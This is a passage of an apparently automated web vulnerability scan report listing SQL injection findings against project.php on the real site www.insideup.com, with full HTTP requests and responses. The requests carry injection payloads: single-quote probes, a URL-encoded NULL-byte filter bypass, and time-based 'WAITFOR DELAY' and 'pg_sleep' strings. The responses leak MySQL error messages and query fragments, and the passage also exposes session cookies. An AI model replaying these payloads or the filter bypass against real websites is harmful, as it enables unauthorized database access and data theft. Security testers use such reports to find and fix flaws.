GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently''&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:13:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.339. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_487%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_487%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_487%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure%00'&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=&attributeId_491_t=&attributeId_492_t=&attributeId_493_t=&attributeId_514_t=&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=bg5bamf9r296qlbk2sumhl6ko7; JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:27:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7118
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=3205__Dental insurance&attributeId_489_t=&attributeId_491_t=&attributeId_492_' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure%00''&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=&attributeId_491_t=&attributeId_492_t=&attributeId_493_t=&attributeId_514_t=&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=bg5bamf9r296qlbk2sumhl6ko7; JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:28:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.340. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_487%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_487%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_487%5B%5D parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure'&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ihr4st2rbabducv3db1vhc8mt4; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.341. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_487%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_487%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_487%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure'&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:13:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=3205__Dental insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_49' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure''&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:13:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.342. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_488%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_488%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_488%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance'&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance''&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.343. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_489_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_489_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_489_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3'&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=us8ldhbp16r2og1j658jhl1d07; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.344. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_489_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
